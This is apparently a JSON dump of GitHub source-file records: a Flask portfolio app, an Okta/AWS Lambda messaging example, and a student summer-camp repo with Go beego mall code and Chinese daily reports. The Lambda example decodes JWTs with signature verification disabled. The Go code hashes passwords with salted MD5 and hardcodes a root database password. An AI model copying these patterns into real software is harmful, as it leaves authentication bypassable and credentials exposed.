[ { "alpha_fraction": 0.7558139562606812, "alphanum_fraction": 0.7848837375640869, "avg_line_length": 56.33333206176758, "blob_id": "417bf4c60eb6dda653910372c1429e714ab000cb", "content_id": "93b005a4a8d96a5bcc4a4b86583c72dd53c3da50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "no_license", "max_line_length": 92, "num_lines": 3, "path": "/README.md", "repo_name": "ekta1999/Portfolio", "src_encoding": "UTF-8", "text": "# Portfolio\nThis repository is to create a sample portfolio web application. \nyou can checkout this here : http://secure-journey-97190.herokuapp.com/ :sparkles::sparkles:\n" }, { "alpha_fraction": 0.6569966077804565, "alphanum_fraction": 0.6791808605194092, "avg_line_length": 16.787878036499023, "blob_id": "2a4f5dfaf804f752cbc145f584e254b984d5613f", "content_id": "0631e314d491010e347e4db2f8d28b1ff169dd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 586, "license_type": "no_license", "max_line_length": 40, "num_lines": 33, "path": "/folio.py", "repo_name": "ekta1999/Portfolio", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nimport json\n\napp = Flask(\"Portfolio\")\n\n\[email protected]('/')\ndef index():\n\treturn render_template('index.html')\n\[email protected]('/images')\ndef images():\n\treturn render_template('images.html')\n\[email protected]('/page1')\ndef page1():\n\treturn render_template('page1.html')\n\[email protected]('/page2')\ndef page2():\n\treturn render_template('page2.html')\n\[email protected]('/page3')\ndef page3():\n\treturn render_template('page3.html')\n\[email protected]('/explore')\ndef explore():\n\treturn render_template('explore.html')\n\n\nif __name__ == \"__main__\":\n\tapp.run(port = 8000, debug = True)" } ]
2
isabella232/okta-aws-python-example
https://github.com/isabella232/okta-aws-python-example
17f284b7286be2417fbb6e8f903fb1f4fcd7d51b
c2b268b41e25fe6c44aaa6b6209f3e32d62744a6
223ab5d52a2e31414deb9587d0010cfd3e5b871b
refs/heads/main
2023-03-21T02:35:06.332627
2020-11-20T15:34:39
2020-11-20T15:34:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.708737850189209, "alphanum_fraction": 0.708737850189209, "avg_line_length": 32, "blob_id": "17b06542f74d68d55c13e99bcc0d6ea7438e7ab2", "content_id": "c31b17a5acf7c8287979d6231927786c0db34c2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 206, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/server/FileHandler.py", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "from tornado.web import StaticFileHandler\n\nclass FileHandler(StaticFileHandler):\n def initialize(self, path):\n self.absolute_path = False\n super(FileHandler, self).initialize(path)\n " }, { "alpha_fraction": 0.571966826915741, "alphanum_fraction": 0.5825169682502747, "avg_line_length": 25.039215087890625, "blob_id": "97d2dfff14dfa2c02fa486c3a61de86f5d430863", "content_id": "b9bf2467153e8d4f477627ae66d91152db703620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1327, "license_type": "no_license", "max_line_length": 67, "num_lines": 51, "path": "/auth-app/messages/messages.py", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "import base64\nimport json\nfrom jwt import (JWT, jwk_from_dict)\nfrom jwt.exceptions import JWTDecodeError\nimport os\n\ninstance = JWT()\npublic_keys = {}\npublic_key = None\nmessages = [\"Messages\"]\n\ndef message(event, context):\n body = get_post_data(event['body'])\n result = verify(body['token'])\n if not bool(result):\n messages.append(body['message'])\n result = { \n 'statusCode': 200,\n 'headers': {\n 'Access-Control-Allow-Headers': 'Content-Type',\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET',\n },\n 'body': json.dumps(messages) \n }\n return result\n\ndef get_post_data(body):\n postdata = {}\n for items in body.split('&'):\n values = items.split('=')\n postdata[values[0]] = 
values[1]\n return postdata\n\ndef verify(token):\n result = {}\n try:\n decoded = instance.decode(token, public_key, False)\n except JWTDecodeError:\n result = { 'statusCode': 403, 'body': 'Forbidden '}\n return result\n\ndef get_keys():\n keys = base64.b64decode(os.environ['OKTA_KEYS'])\n jwks = json.loads(keys)\n for jwk in jwks['keys']:\n kid = jwk['kid']\n public_key = jwk_from_dict(jwk)\n public_keys[kid] = public_key\n\nget_keys()" }, { "alpha_fraction": 0.7355982065200806, "alphanum_fraction": 0.7415066361427307, "avg_line_length": 29.772727966308594, "blob_id": "4d6888ba13769c8561936b9766a7bf5d152b5416", "content_id": "b7a5e0a3b39d6d638df1d3cd54bb317c7cdc3ce6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 57, "num_lines": 22, "path": "/server/__main__.py", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "import signal\nimport sys\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom tornado.options import define, options\nfrom tornado.web import Application, RequestHandler\nfrom server.FileHandler import FileHandler\n\ndefine(\"port\", default=8080, help=\"Listener port\")\noptions.parse_command_line()\napplication = Application([\n ('/()$', FileHandler, {'path': \"client/index.html\"}),\n ('/(.*)', FileHandler, {'path': \"client\"}),\n])\nhttp_server = HTTPServer(application)\nhttp_server.listen(options.port)\nprint(\"Listening on port\", options.port)\ntry:\n IOLoop.current().start()\nexcept KeyboardInterrupt:\n print(\"Exiting\")\n IOLoop.current().stop()\n" }, { "alpha_fraction": 0.7335907220840454, "alphanum_fraction": 0.7335907220840454, "avg_line_length": 31.375, "blob_id": "3a164e7acea4eef4cbc736148f67b2e0240b6e2e", "content_id": "9b1ae5840dceab0beb1da8a9c2434adde84fc9f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", 
"length_bytes": 259, "license_type": "no_license", "max_line_length": 130, "num_lines": 8, "path": "/README.md", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "# aws-python\nHow to write a secure Python Serverless App on AWS Lambda\n\nI you get an error message from `pip`: `ModuleNotFoundError: No module named 'pip._internal.cli.main'`you need to reinstall `pip`.\n\n```bash\npython -m pip install --upgrade pip --user\n```\n" } ]
4
Deependrakumarrout/Diet-and-Exercise-Instructor
https://github.com/Deependrakumarrout/Diet-and-Exercise-Instructor
b27bab6d17adf921d64082be7e62ccadf60253bd
6933bcd1c3489487e2e2e013f2b49aec10ff87fb
6c97a96abc339a67936206f1db87f29540fc2668
refs/heads/master
2020-08-07T14:57:16.334812
2019-10-07T22:19:30
2019-10-07T22:19:30
213,496,625
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.641363263130188, "alphanum_fraction": 0.6467854380607605, "avg_line_length": 38.69230651855469, "blob_id": "60d5926b2da68c20e8f1fbef0fa2a21a9964b259", "content_id": "16fe766953a18f28684cee443f54f6105caee85b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2582, "license_type": "no_license", "max_line_length": 111, "num_lines": 65, "path": "/Diet and Exercise instructor.py", "repo_name": "Deependrakumarrout/Diet-and-Exercise-Instructor", "src_encoding": "UTF-8", "text": "\n#A function to show the recent time.\ndef getdate():\n import datetime\n return datetime.datetime.now()\n\n#Dictionary of client.\nclient_list={1:\"Mohan\",2:\"Rajan\",3:\"Lathor\"}\n#Instructor recommended list.\nrecommended_list={1:\"Diet\",2:\"Exercise\"}\n#To log or retrieve option.\nlog_or_retrieve={1:\"log\",2:\"retrieve\"}\n\n#Client dictionary process-\nprint()\nprint(\"Please select one of the client:\")\nfor key,value in client_list.items():\n print(f\"Press {key} for {value}\")\ntry:\n client_name=int(input(\"Enter here:\"))\n\n if client_name == 1 or client_name == 2 or client_name == 3:\n print(f\"You have selected to {client_list[client_name]}\")\n\n #Instructor recommended dictionary process-\n print()\n print(\"Please select the recommended option:\")\n for key,value in recommended_list.items():\n print(f\"Press {key} for {value}\")\n recommended_name=int(input(\"Enter here:\"))\n if recommended_name == 1 or recommended_name == 2:\n print(f\"You have selected to {recommended_list[recommended_name]}\")\n\n #Option for log or retrieve\n print()\n print(\"sir/Ma'am what you want to do [log or retrieve] :\")\n for key,value in log_or_retrieve.items():\n print(f\"Press {key} for {value}\")\n log_or_retrieve_input=int(input(\"Enter here:\"))\n\n #if User select log then it will create a new file for that.\n if log_or_retrieve_input == 1:\n print(\"You have selected to log:\")\n print(\"Generating: 
\"+client_list[client_name]+\"_\"+recommended_list[recommended_name]+\" type schedule:\")\n file=open(client_list[client_name]+\"_\"+recommended_list[recommended_name]+\".txt\",\"a\")\n repeat=\"y\"\n while repeat not in \"n\":\n input_txt=input(f\"Enter the recommended to do {recommended_list[recommended_name]}:\")\n file.write(\"[\"+str(getdate())+\"]\" + input_txt + \"\\n\")\n repeat=input(\"Press y to continue or n to stop:\")\n continue\n file.close()\n\n #if retrieve then it will show what the instructor gave the advice to client.\n elif log_or_retrieve_input == 2:\n print(\"You have selected to retrieve:\")\n print(client_list[client_name]+\"_\"+recommended_list[recommended_name]+\" Report:\")\n file=open(client_list[client_name]+\"_\"+recommended_list[recommended_name]+\".txt\",\"rt\")\n contant=file.readlines()\n for line in contant:\n print(line,end=\"\")\n file.close()\n else:\n print(\"Please put the correct number to proceed\")\nexcept:\n print(\"[You are not allow to give these option see above you have type wrong input..]\")\n\n" } ]
1
tofar/bingyan-summer-camp2018
https://github.com/tofar/bingyan-summer-camp2018
1c3404ef303b93e5cc514133f1e8abed22eed3c4
0907bdd9be62806189c751bf86faec791d666edc
9f4f25ed640c9aa6068873b54944e399abae3b49
refs/heads/master
2018-10-11T06:53:26.732182
2018-07-26T10:13:58
2018-07-26T10:13:58
138,950,886
6
8
null
null
null
null
null
[ { "alpha_fraction": 0.6399999856948853, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 9.857142448425293, "blob_id": "e0ad965fe85c2d7b1c86bce621c4ca7e1fd67fba", "content_id": "871673495bda4f70e3c66039a075d7e3275e578f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 40, "num_lines": 7, "path": "/Shixiaoyanger/日报/7.24.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.24日报\n\n1.部署了nginx\n\n2.调试接口,因为对js语法不熟悉,卡了好久,最终凑合能交互了,明天要写出前端来\n\n3.加密分享" }, { "alpha_fraction": 0.7551020383834839, "alphanum_fraction": 0.8163265585899353, "avg_line_length": 8.800000190734863, "blob_id": "6bd04c87ae1ef31ad7274db37600acd2fa1608b6", "content_id": "29ac6af4726e2abe37fdfe7d1fc4a5b6dc38729a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 113, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/jackwener/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14日报\n\n把除了cookie外的和网页认证外的基本都实现了。\n\n晚上想了想重构代码的事\n" }, { "alpha_fraction": 0.6219512224197388, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 8.222222328186035, "blob_id": "48fa2dbcc2721f5ede529099dccd4ce48fd51a97", "content_id": "35b1cc8c355a9035292506f2c44df4d83ea3851a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 168, "license_type": "no_license", "max_line_length": 23, "num_lines": 9, "path": "/Shixiaoyanger/日报/7.22.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.22日报\n\n**周末没干太多事**\n\n1.写了记录时间的函数以及最新查询\n\n2.图片的传输、储存\n\n3.看了点JavaScript,打算开始写前端" }, { "alpha_fraction": 0.5870580673217773, "alphanum_fraction": 0.6497665047645569, "avg_line_length": 31.23655891418457, "blob_id": "2d8676f46c2ec32f5d94282314460d2a1f8feb7c", 
"content_id": "26a75fc44cc33c8cbda94f2db160eadf11a46fd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3600, "license_type": "no_license", "max_line_length": 86, "num_lines": 93, "path": "/Shixiaoyanger/market/controllers/Main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego\"\n\t\"market/models\"\n)\n// Predefined const error strings.\nconst (\n\tErrInputData = \"数据输入错误\"\n\tErrDatabase = \"数据库操作错误\"\n\tErrDupUser = \"用户信息已存在\"\n\tErrNoUser = \"用户信息不存在\"\n\tErrPass = \"密码不正确\"\n\tErrNoUserPass = \"用户信息不存在或密码不正确\"\n\tErrNoUserChange = \"用户信息不存在或数据未改变\"\n\tErrInvalidUser = \"用户信息不正确\"\n\tErrOpenFile = \"打开文件出错\"\n\tErrWriteFile = \"写文件出错\"\n\tErrSystem = \"操作系统错误\"\n)\n\n// ControllerError is controller error info structer.\ntype ControllerError struct {\n\tStatus int `json:\"status\"`\n\tCode int `json:\"code\"`\n\tMessage string `json:\"message\"`\n\tDevInfo string `json:\"dev_info\"`\n\tMoreInfo string `json:\"more_info\"`\n}\ntype UserStruct struct{\n\tUser \t \t models.User\n\tStatusCode *StatusCode\n}\ntype GoodsStruct struct{\n\tGoodsinfo \t[]*models.Goods\n\tStatusCode *StatusCode\n}\ntype StatusCode struct{\n\tStatus int64 \t `json:\"status\"`\n\tCode int64 \t `json:\"code\"`\n\tMessage string \t `json:\"message\"`\n\tDevInfo string \t `json:\"dev_info\"`\n\tMoreInfo string \t `json:\"more_info\"`\n\n}\n\n// Predefined controller error values.\nvar (\n\terr404 = &ControllerError{404, 404, \"page not found\", \"page not found\", \"\"}\n\terrInputData = &ControllerError{400, 10001, \"数据输入错误\", \"客户端参数错误\", \"\"}\n\terrDatabase1 = &ControllerError{500, 10002, \"服务器错误\", \"数据库操作错误\", \"\"}\n\terrDupUser = &ControllerError{400, 10003, \"用户信息已存在\", \"数据库记录重复\", \"\"}\n\terrNoUser = &ControllerError{400, 10004, \"用户信息不存在\", \"数据库记录不存在\", \"\"}\n\terrPass = &ControllerError{400, 10005, \"用户信息不存在或密码不正确\", 
\"密码不正确\", \"\"}\n\terrNoUserPass = &ControllerError{400, 10006, \"用户信息不存在或密码不正确\", \"数据库记录不存在或密码不正确\", \"\"}\n\terrNoUserChange = &ControllerError{400, 10007, \"用户信息不存在或数据未改变\", \"数据库记录不存在或数据未改变\", \"\"}\n\terrInvalidUser = &ControllerError{400, 10008, \"用户信息不正确\", \"Session信息不正确\", \"\"}\n\terrOpenFile = &ControllerError{500, 10009, \"服务器错误\", \"打开文件出错\", \"\"}\n\terrWriteFile = &ControllerError{500, 10010, \"服务器错误\", \"写文件出错\", \"\"}\n\terrSystem = &ControllerError{500, 10011, \"服务器错误\", \"操作系统错误\", \"\"}\n\terrExpired = &ControllerError{400, 10012, \"登录已过期\", \"验证token过期\", \"\"}\n\terrPermission = &ControllerError{400, 10013, \"没有权限\", \"没有操作权限\", \"\"}\n\n\terrNoGoods = &ControllerError{400, 20001, \"商品信息不存在\", \"数据库记录不存在\", \"\"}\n\terrDatabase2 = &ControllerError{500, 20002, \"服务器错误\", \"数据库操作错误\", \"\"}\n)\n//Predefined Statuscode values.\nvar (\n\tsucregist = &StatusCode{200,2001,\"注册成功\",\"\",\"\"}\n\tsucgoodsinfo =&StatusCode{200,2002,\"查询成功\",\"\",\"\"}\n\tsucgosearch =&StatusCode{200,2003,\"\",\"\",\"\"}\n\tsuc2 =&StatusCode{200,2004,\"\",\"\",\"\"}\n\tsuc3 =&StatusCode{200,2005,\"\",\"\",\"\"}\n\tsuc4 =&StatusCode{200,2006,\"\",\"\",\"\"}\n\tsuc5 =&StatusCode{200,2007,\"\",\"\",\"\"}\n)\n\n\ntype MainController struct {\n\tbeego.Controller\n}\n\nfunc (c *MainController) Get() {\n\tc.Data[\"Website\"] = \"beego.me\"\n\tc.Data[\"Tel\"] = \"[email protected]\"\n\tc.TplName = \"index.tpl\"\n}\n//return error info\nfunc (this *MainController) RetError(e *ControllerError){\n\tthis.Data[\"json\"] = e\n\tthis.ServeJSON()\n\n}\n" }, { "alpha_fraction": 0.6557376980781555, "alphanum_fraction": 0.6618852615356445, "avg_line_length": 23.399999618530273, "blob_id": "fba59c52ccf035a113fdbaf38b6b22674339c537", "content_id": "e30e5a4071e4e5f547b449fc91ce67ca5b92f162", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 488, "license_type": "no_license", "max_line_length": 48, "num_lines": 20, "path": 
"/Old-Li883/mall/views/guys_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom views import app\nfrom model.guys import login, logout\nfrom util.response import response\n\n\[email protected]('/api/login', methods=['post'])\ndef log_in():\n if request.cookies.get(\"id\"):\n return response(403, \"you id had login\")\n data = request.get_json()\n id = data['id']\n password = data['password']\n status = request.args.get('status')\n return login(id, password, status)\n\n\[email protected]('/api/logout')\ndef log_out():\n return logout()\n" }, { "alpha_fraction": 0.6938775777816772, "alphanum_fraction": 0.7551020383834839, "avg_line_length": 9, "blob_id": "d425cb8ccde795e44168569b18c45e1e7befbb0a", "content_id": "f58493991b2d2b8a8118fdc917b49c2b474c6e6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/Shixiaoyanger/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11日报\n搞了一天api\n稍微有点头绪了\n乱成一团\n应该明天就可以做出大致框架了" }, { "alpha_fraction": 0.729411780834198, "alphanum_fraction": 0.7470588088035583, "avg_line_length": 7.8947367668151855, "blob_id": "25dfcec1da99ef8d2d75ec3a4ef292a3d87f051b", "content_id": "f2e4dfc0a79af99bbc48857e653c57134c5a04f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 408, "license_type": "no_license", "max_line_length": 40, "num_lines": 19, "path": "/Shixiaoyanger/日报/7.19.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.19日报\n\nemmmm\n\n先做个自我检讨\n\n这几天效率有些低,我要加快脚步了\n\n#####上午和中午\n\n学院组织有个任务,排版了一下一个练手杂志任务\n\n#####下午晚上\n\n开始写商城项目\n\n写完了部分路由,以及部分数据库操作,简单的增删查改,写完了登录和注册以及查询接口\n\n期间又看了一下beego中高级的数据库操作\n\n" }, { "alpha_fraction": 0.6740442514419556, "alphanum_fraction": 0.682092547416687, 
"avg_line_length": 10.581395149230957, "blob_id": "44b1dc47ba08f44b96ec71fa0e7ce90235cf0822", "content_id": "7b30c0873229e666c5a829f762532023e32246cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 933, "license_type": "no_license", "max_line_length": 65, "num_lines": 43, "path": "/Old-Li883/README.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "### 操作说明:\n\n- 首先 fork [此仓库](https://github.com/tofar/bingyan-summer-camp2018)\n\n- 在你的仓库操作的时候请不要对他人目录进行任何操作\n\n- 你的操作权限仅限于你的目录,目录名字为你的 githubID,若仓库中没有你的目录请自行创建\n\n- 提交 PR 的时候自行查看是否存在代码冲突,如果存在自行解决之后再提交 PR\n\n- 提交 PR 是提交到 dev 分支,不是 master 分支\n\n- 提交之后最好跟导师说一声,让导师及时检查\n\n- 目录结构推荐如下:\n\n README.md 必须注明相关开发环境,以及一些特殊说明\n\n .gitignore 忽略一些不需要的文件\n\n client\n\n 前端代码,如果不用webpack之类的打包的话,直接一个 dist 文件夹即可\n\n - dist\n\n 编译打包后的文件目录\n\n - index.html\n - css\n - js\n\n - src\n\n 源码\n\n server\n\n 服务端代码\n\n - src\n\n 源码" }, { "alpha_fraction": 0.604651153087616, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 7.599999904632568, "blob_id": "4254f742cfe154a023cc1494ddd87d6216294da5", "content_id": "9853065f07137f8a5c9f277c449ccf7aab1fbf5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/jackwener/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12日报\n\n把beego的基础文档重新看了下。\n\n实现了展现和删除.....\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.746666669845581, "avg_line_length": 8.5, "blob_id": "fdde5f27cf9a10a745cdf33a3d6cf27241f9639f", "content_id": "896ba48ad44bebabc97d3dff3740ab7bcfeb0b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 121, "license_type": "no_license", "max_line_length": 21, "num_lines": 8, "path": "/Old-Li883/日报/7.6.md", "repo_name": 
"tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.6学习内容\n\n1. 学习cookie,session机制\n2. 学习MySQL,及三范式\n\n# 7.7计划\n\n在python练习使用MySQL" }, { "alpha_fraction": 0.843137264251709, "alphanum_fraction": 0.8666666746139526, "avg_line_length": 27.22222137451172, "blob_id": "37dac7337d90f3df85712fe73454c2f66ca8bdb1", "content_id": "548882ef262ae5c88db95d0aa636289cccbdb096", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 661, "license_type": "no_license", "max_line_length": 97, "num_lines": 9, "path": "/Old-Li883/日报/7.17.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.17\n\n今天继续做商城项目,把昨天预计的难点攻克了,预计明天应该可以完成计划的商城后台功能的(但愿不出意外)\n\nbug\n\n1. 动态创建数据表:(pycharm)变量不能是字符串,因为他本身就是一个字符串,应强制转换,我把他转化成整型\n2. 数据库一定要记得commit要不然数据不会真正提交到数据库中\n3. 在图片的存储过程中,本来上网查想将图片read下来然后直接存在数据库中,不过这样感觉过于恐怖,后来在学长的帮助下用nginx配置了一个静态文件,以后只需把路径存在数据库中,告诉前端就OK了\n\n" }, { "alpha_fraction": 0.7951807379722595, "alphanum_fraction": 0.8373494148254395, "avg_line_length": 17.55555534362793, "blob_id": "f6bb50850dec1e570382a6910c9138473f052e1a", "content_id": "27f3f2a91d919d67b9c1d69625b65a11cfa43c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 402, "license_type": "no_license", "max_line_length": 48, "num_lines": 9, "path": "/Shixiaoyanger/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.20日报\n\n1.又看了json和session,以前的有些理解好像错了,没深入研究,等到写的差不多了在修改吧\n\n2.学习了beego高级查询的用法,开始写商品的查询修改添加等操作\n\n3.添加数据库测试用例,因为语法不熟悉卡了好久\n\n4.返回大量信息的函数出错了,应该是没理解好slice还有指针等的关系,明天在修改" }, { "alpha_fraction": 0.6985645890235901, "alphanum_fraction": 0.7224880456924438, "avg_line_length": 11.29411792755127, "blob_id": "0f49c0aa3f5252a1f66f76f0efba8fa98d61b16b", "content_id": "803e6b421b004ff1cd871640e3352abe934531e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 414, 
"license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/yixiaoer/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.20日报\n\n## 今日计划\n* 完成基本功能的后台部分\n\n## 完成情况\n### 遇到的一些情况\n1. 中文变量\n * 可以是中文变量,但是在后续处理中可能会出现问题\n2. mangodb中数据库的id相关\n* 是根据时间机器等信息生成的一个唯一的id\n* 在进行查找匹配时,可以使用FindiD或者bson.ObjectIdHex( )\n\n### 前端相关\n\n明日继续\nto be continued😶\n" }, { "alpha_fraction": 0.6518904566764832, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 20.10091781616211, "blob_id": "b974092873e93d6ddd0224a9967c11f4c760bca5", "content_id": "b73fe0d7247fd27d7ec23dc8a7e6682200a39147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2397, "license_type": "no_license", "max_line_length": 104, "num_lines": 109, "path": "/jackwener/server/mall/controllers/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego\"\n\t\"encoding/json\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"fmt\"\n\t\"mall/encryptions\"\n\t\"mall/models\"\n)\n\ntype MainController struct {\n\tbeego.Controller\n}\n\nfunc (c *MainController) Login() {\n\tvar ob models.UserJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tname := ob.User.Name\n\tpwd := ob.User.Password\n\tpassword := encryptions.Salt(pwd)//MD5加盐加密\n\tuser := models.User{}\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"user\").Filter(\"name\", name).Filter(\"password\", password).One(&user)\n\tid := user.Id\n\tfmt.Print(err)\n\tif err == nil {\n\t\tfmt.Print(err)\n\t\tvar reJson models.UserJson\n\t\treJson.Status = 200\n\t\treJson.Message = \"登录成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\tc.SetSession(\"userId\", id)\n\t\tfmt.Print(\"设置了\")\n\t\treturn\n\t} else {\n\t\tvar reJson models.UserJson\n\t\treJson.Status = 401\n\t\treJson.Message = \"登录失败\"\n\t\tc.Data[\"json\"] = 
reJson\n\t\tc.ServeJSON()\n\t}\n}\n\n// 注册\nfunc (c *MainController) Register() {\n\tvar ob models.UserJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tname := ob.User.Name\n\tpwd := ob.User.Password\n\tpassword := encryptions.Salt(pwd)\n\tnickname := ob.User.Nickname\n\to := orm.NewOrm()\n\tuser := models.User{\n\t\tId: name,\n\t\tName: name,\n\t\tPassword: password,\n\t\tNickname: nickname,\n\t\tPageViews: 0,\n\t}\n\tvar car models.Car\n\tcar.Id = name\n\tuser.Car = &car\n\to.Insert(&car)\n\t_,err := o.Insert(&user)\n\tif err == nil {\n\t\treJson := models.UserJson{}\n\t\treJson.Status = 200\n\t\treJson.Message = \"注册成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Print(err)\n\t\treJson := models.UserJson{}\n\t\treJson.Status = 406\n\t\treJson.Message = \"注册失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t}\n}\n\n// 返回个人信息页的一些基本信息\nfunc (c *MainController) Person() {\n\tname := c.GetString(\":user\")\n\tfmt.Printf(name)\n\tvar user models.User\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"user\").Filter(\"name\", name).One(&user)\n\tif err != nil {\n\t\tvar reJson models.UserJson\n\t\treJson.Status = 400\n\t\treJson.Message = \"用户不存在\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\to.QueryTable(\"user\").Filter(\"name\", name).Update(orm.Params{\"page_views\": orm.ColValue(orm.ColAdd, 1)})\n\tvar reJson models.UserJson\n\treJson.User =user\n\treJson.Status = 200\n\treJson.Message = \"返回成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n" }, { "alpha_fraction": 0.6406926512718201, "alphanum_fraction": 0.6458874344825745, "avg_line_length": 20.0181827545166, "blob_id": "1215a7326a38642533d684e8edf2f034f6885d40", "content_id": "e3fea406e764def1b566edf977586b2ba0f162f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1221, "license_type": "no_license", "max_line_length": 104, "num_lines": 55, "path": 
"/jackwener/server/mall/models/model.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport (\n\t\"github.com/astaxie/beego/orm\"\n\t_ \"github.com/go-sql-driver/mysql\"\n\t\"time\"\n)\n\ntype Good struct {\n\tId string `orm:\"pk\"`\n\tTitle string\n\tLocal string\n\tKind string\n\tIntro string\n\tPrice int\n\tCars \t[]*Car `orm:\"rel(m2m)\"`\n\tViews int\n}\n\ntype Car struct {\n\tId string `orm:\"pk\"`\n\tUser *User `orm:\"reverse(one)\"`\n\tGoods []*Good `orm:\"reverse(many)\"`\n}\n\ntype User struct{\n\tId string `orm:\"pk\"`\n\tName string\n\tPassword string\n\tNickname string\n\tPageViews int\n\tCar *Car `orm:\"rel(one)\"`\n\tInform []*Inform `orm:\"reverse(many)\"` // 设置一对多的反向关系\n}\n\ntype Record struct {\n\tId int `orm:\"pk\"`\n\tContent string\n\tDate orm.DateTimeField\n\tNumber int\n}\n\ntype Inform struct {\n\tId string `orm:\"pk\"`\n\tUser *User `orm:\"rel(fk)\"`\n\tContent string\n}\n\nfunc init(){\n\torm.RegisterDriver(\"mysql\", orm.DRMySQL)\n\torm.RegisterDataBase(\"default\", \"mysql\", \"root:jakevin@tcp(localhost:3306)/mall_goods?charset=utf8\")\n\torm.RegisterModel(new(User), new(Good),new(Car),new(Record),new(Inform)) // 注册模型,建立User类型对象,注册模型时,需要引入包\n\torm.RunSyncdb(\"default\",false,true)\n\torm.DefaultTimeLoc = time.UTC\n}" }, { "alpha_fraction": 0.6545454263687134, "alphanum_fraction": 0.7090908885002136, "avg_line_length": 7, "blob_id": "5119b7795684fd23e52f58195aaaf69cbeeebd5f", "content_id": 